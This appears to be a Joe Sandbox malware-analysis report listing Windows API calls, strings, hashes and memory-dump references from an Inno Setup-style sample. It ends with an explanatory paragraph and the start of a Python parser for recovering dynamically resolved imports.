• Opcode Fuzzy Hash: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
• Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
• MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: File$Attributes$Move
• String ID: isRS-%.3u.tmp
• API String ID: 3839737484-3657609586
• Opcode ID: 1f4ba81bd314e92a31c307d6850739873bb922dca52444ea26c7a0748bf5c42b
• Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
• Opcode Fuzzy Hash: 1f4ba81bd314e92a31c307d6850739873bb922dca52444ea26c7a0748bf5c42b
• Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
Uniqueness

Uniqueness Score: -1.00%

APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
• ExitProcess.KERNEL32 ref: 00404E0D
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExitMessageProcess
                                                                                                                                                                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                                                  • API String ID: 1220098344-2970929446
                                                                                                                                                                                                                                  • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                                                                                                                                                  • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                                                                                                                                                    • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                                                                                                                    • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                                                                                                                  • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                                                                                                                                                                  • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                                                                                                                                                                  • String ID: LoadTypeLib$RegisterTypeLib
                                                                                                                                                                                                                                  • API String ID: 1312246647-2435364021
                                                                                                                                                                                                                                  • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                                                                                                                                                                  • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Failed to create DebugClientWnd, xrefs: 004571D4
                                                                                                                                                                                                                                  • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                  • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                                                                                                                                                                  • API String ID: 3850602802-3720027226
                                                                                                                                                                                                                                  • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                                                                                                                                                                  • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 00478757
                                                                                                                                                                                                                                  • GetKeyState.USER32(0000007A), ref: 00478769
                                                                                                                                                                                                                                  • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FocusMessageStateTextWaitWindow
                                                                                                                                                                                                                                  • String ID: Wnd=$%x
                                                                                                                                                                                                                                  • API String ID: 1381870634-2927251529
                                                                                                                                                                                                                                  • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                                                                                                                                                                  • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Time$File$LocalSystem
• String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
• API String ID: 1748579591-1013271723
• Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
• Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
• Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
• Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
• MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: File$AttributesDeleteErrorLastMove
• String ID: DeleteFile$MoveFile
• API String ID: 3024442154-139070271
• Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
• Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
• Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
• Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseOpen
• String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
• API String ID: 47109696-2631785700
• Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
• Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
• Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
• Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
• RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
Strings
• CSDVersion, xrefs: 00483BFC
• System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: CSDVersion$System\CurrentControlSet\Control\Windows
• API String ID: 3677997916-1910633163
• Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
• Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
• Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
• Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetSystemWow64DirectoryA$kernel32.dll
• API String ID: 1646373207-4063490227
• Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
• Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
• Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
• Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                                                                                                                                                                  • API String ID: 1646373207-260599015
                                                                                                                                                                                                                                  • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                                                                                                                                                  • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: NotifyWinEvent$user32.dll
• API String ID: 1646373207-597752486
• Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
• Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
• Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
• Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: DisableProcessWindowsGhosting$user32.dll
• API String ID: 1646373207-834958232
• Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
• Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
• Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
• Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
• LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
• GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: SHPathPrepareForWriteA$shell32.dll
• API String ID: 2238633743-2683653824
• Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
• Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
• Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
• Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
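The records above show the sample resolving user32.dll, uxtheme.dll and shell32.dll exports at run time through GetModuleHandleA / LoadLibraryA followed by GetProcAddress. Imports resolved this way do not appear in the PE import table, so an analyst recovers them from these API records instead. The following parser is an added example, not part of the Joe Sandbox report or its tooling: it reads the "APIs" and "String ID" lines in the format shown above and rebuilds a DLL-to-export map. The regular expressions assume exactly the record layout on this page; the sample input is a handful of lines copied from the records above with their leading whitespace trimmed.

```python
"""Recover dynamically resolved imports from Joe Sandbox API records.

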